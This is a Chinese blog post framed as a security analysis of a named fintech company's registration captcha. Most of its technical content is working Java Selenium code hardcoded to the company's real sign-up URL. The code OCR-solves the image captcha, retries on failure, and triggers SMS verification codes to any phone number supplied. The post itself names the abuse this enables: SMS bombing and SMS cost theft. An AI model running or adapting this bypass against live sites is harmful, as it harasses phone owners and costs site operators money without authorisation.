当前位置: 首页 > news >正文

【占融数科-注册/登录安全分析报告】

前言

由于网站注册入口容易被黑客攻击,存在如下安全问题:

  1. 暴力破解密码,造成用户信息泄露
  2. 短信盗刷的安全问题,影响业务及导致用户投诉
  3. 带来经济损失,尤其是后付费客户,风险巨大,造成亏损无底洞
    在这里插入图片描述
    所以大部分网站及App 都采取图形验证码或滑动验证码等交互解决方案, 但在机器学习能力提高的当下,连百度这样的大厂都遭受攻击导致点名批评, 图形验证及交互验证方式的安全性到底如何? 请看具体分析

一、 占融数科PC 注册入口

简介:占融数科(占融数科)成立于2025年之前,核心定位为数字金融服务平台,服务对象包括银行、持牌消费金融公司、保险公司等金融机构。其业务覆盖智能营销、风控、贷中监控、贷后管理等全流程,并提供资产对接、系统实施等配套服务。

在这里插入图片描述

在这里插入图片描述

安全分析:
采用传统的图形验证码方式,具体为4个英文及数字,ocr 识别率在 95% 以上。

测试方法:
采用模拟器+OCR识别

1 模拟器交互部分


private OcrClientDddd ddddOcr = new OcrClientDddd();private static String INDEX_URL = "https://zhanrong.rong360.com/site/index/register";@Overridepublic RetEntity send(WebDriver driver, String areaCode, String phone) {RetEntity retEntity = new RetEntity();try {driver.get(INDEX_URL);Thread.sleep(1 * 1000);// 1 输入手机号Thread.sleep(1 * 1000);WebElement phoneElement = ChromeUtil.waitElement(driver, By.xpath("//input[@placeholder='联系电话']"), 1);phoneElement.sendKeys(phone);// 2 获取图形验证码// 2 获取图形验证码String imgCode = null;WebElement imgElement;byte[] imgByte;StringBuffer imgCodeList = new StringBuffer();for (int i = 0; i < 10; i++) {imgElement = driver.findElement(By.xpath("//img[contains(@src,'/account/vcode?v=')]"));String url = imgElement.getAttribute("src");imgByte = GetImage.callJsByUrl(driver, url);int len = (imgByte != null) ? imgByte.length : 0;imgCode = (len > 500) ? ddddOcr.getImgCode(imgByte) : null;if (imgCode == null || imgCode.length() != 4) {((JavascriptExecutor) driver).executeScript("arguments[0].click();", imgElement);Thread.sleep(1000);// 记录尝试次数及解析验证码if (imgCodeList.length() > 0)imgCodeList.append(",");imgCodeList.append(i + ":" + imgCode);continue;}break;}if (imgCode == null || imgCode.length() != 4) {retEntity.setMsg(imgCodeList.toString());return retEntity;}// 3 输入识别出来的图形验证码WebElement inputVcodeElement = driver.findElement(By.xpath("//input[@placeholder='图形验证码']"));inputVcodeElement.sendKeys(imgCode);// 4 点击获取验证码Thread.sleep(1 * 1000);WebElement sendElement = driver.findElement(By.xpath("//button/span[contains(text(),'获取验证码')]"));sendElement.click();Thread.sleep(1 * 1000);String gtInfo = sendElement.getText();retEntity.setMsg("imgCode:" + imgCode + "->" + gtInfo);if (gtInfo != null && gtInfo.contains("s后重新获取")) {retEntity.setRet(0);return retEntity;}return retEntity;} catch (Exception e) {System.out.println("phone=" + phone + ",e=" + e.toString());for (StackTraceElement ele : e.getStackTrace()) {System.out.println(ele.toString());}return null;} finally {driver.manage().deleteAllCookies();}}

2 获取图形验证码


public String getImgCode(byte[] bigImage) {try {if (ddddUrl == null) {System.out.println("getImgCode() ddddUrl=" + ddddUrl);return null;}int len = (bigImage != null) ? bigImage.length : -1;if (len < 0) {System.out.println("getImgCode() len=" + len);return null;}long time = (new Date()).getTime();HttpURLConnection con = null;String boundary = "----------" + String.valueOf(time);String boundarybytesString = "\r\n--" + boundary + "\r\n";OutputStream out = null;URL u = new URL(ddddUrl);con = (HttpURLConnection) u.openConnection();con.setRequestMethod("POST");con.setConnectTimeout(10 * 1000);con.setReadTimeout(10 * 1000);con.setDoOutput(true);con.setDoInput(true);con.setUseCaches(true);con.setRequestProperty("Content-Type", "multipart/form-data; boundary=" + boundary);out = con.getOutputStream();out.write(boundarybytesString.getBytes("UTF-8"));String paramString = "Content-Disposition: form-data; name=\"image\"; filename=\"" + "bigNxt.gif" + "\"\r\n";paramString += "Content-Type: application/octet-stream\r\n\r\n";out.write(paramString.getBytes("UTF-8"));out.write(bigImage);String tailer = "\r\n--" + boundary + "--\r\n";out.write(tailer.getBytes("UTF-8"));out.flush();out.close();StringBuffer buffer = new StringBuffer();BufferedReader br = new BufferedReader(new InputStreamReader(con.getInputStream(), "UTF-8"));String temp;while ((temp = br.readLine()) != null) {buffer.append(temp);}String ret = buffer.toString();if (ret.length() < 1) {System.out.println("getImgCode() ddddUrl=" + ddddUrl + ",len=" + len + "->ret=" + buffer.toString());}return buffer.toString();} catch (Throwable e) {logger.error("getImgCode() ddddUrl=" + ddddUrl + ",e=" + e.toString());return null;}}

3 测试返回结果:

在这里插入图片描述

4 测试报告 :

在这里插入图片描述

二丶结语

占融数科(占融数科)成立于2025年之前,核心定位为数字金融服务平台,服务对象包括银行、持牌消费金融公司、保险公司等金融机构。其业务覆盖智能营销、风控、贷中监控、贷后管理等全流程,并提供资产对接、系统实施等配套服务。
作为金融风控服务商,技术实力雄厚, 采用的却还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。

很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
比如:“ 需求这么赶,当然是先实现功能啊 ”,“ 业务量很小啦,系统就这么点人用,不怕的 ” , “ 我们怎么会被盯上呢,不可能的 ”等等。

有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。

所以大家在安全方面还是要重视。(血淋淋的栗子!)#安全短信#

戳这里→康康你手机号在过多少网站注册过!!!

谷歌图形验证码在AI 面前已经形同虚设,所以谷歌宣布退出验证码服务, 那么当所有的图形验证码都被破解时,大家又该如何做好防御呢?

>>相关阅读
《腾讯防水墙滑动拼图验证码》
《百度旋转图片验证码》
《网易易盾滑动拼图验证码》
《顶象区域面积点选验证码》
《顶象滑动拼图验证码》
《极验滑动拼图验证码》
《使用深度学习来破解 captcha 验证码》
《验证码终结者-基于CNN+BLSTM+CTC的训练部署套件》

相关文章:

  • Kotlin Compose Button 实现长按监听并实现动画效果
  • Text2SQL在Spark NLP中的实现与应用:将自然语言问题转换为SQL查询的技术解析
  • 深度学习---模型预热(Model Warm-Up)
  • 【实战】GPT-SoVITS+内网穿透:3分钟搭建可公网访问的语音克隆系统
  • 苍穹外卖 - Day03
  • 【AI News | 20250519】每日AI进展
  • 深度强化学习 | 基于SAC算法的移动机器人路径跟踪(附Pytorch实现)
  • Manus AI 突破多语言手写识别技术壁垒:创新架构、算法与应用解析
  • 9万字67道Java集合经典面试题(2025修订版)
  • 安全强化的Linux
  • 云原生时代的系统可观测性:理念变革与实践体系
  • 枪机定焦系统的自动控制装置
  • 1.3.3 数据共享、汇聚和使用中的安全目标
  • spring中的EnvironmentPostProcessor接口详解
  • 虚拟币制度钱包开发:功能设计与成本全解析
  • c#基础01(.Net介绍)
  • 每日c/c++题 备战蓝桥杯(洛谷P1440 求m区间内的最小值 详解(单调队列优化))
  • RHCE 练习三:架设一台 NFS 服务器
  • 02-前端Web开发(JS+Vue+Ajax)
  • Oracle 数据库的默认隔离级别
  • 中国预警机雷达有多强?可数百公里外看清足球轨迹
  • 被央视曝光“废旧厂区沦为垃圾山”,江西萍乡成立调查组查处
  • 高温最强时段来了!北方局地高温有明显极端性
  • 见微知沪|科学既要勇攀高峰,又要放低身段
  • 外企聊营商|上海仲裁:化解跨国企业纠纷的“上海路径”
  • 首次带人形机器人走科技节红毯,傅利叶顾捷:没太多包袱,很多事都能从零开始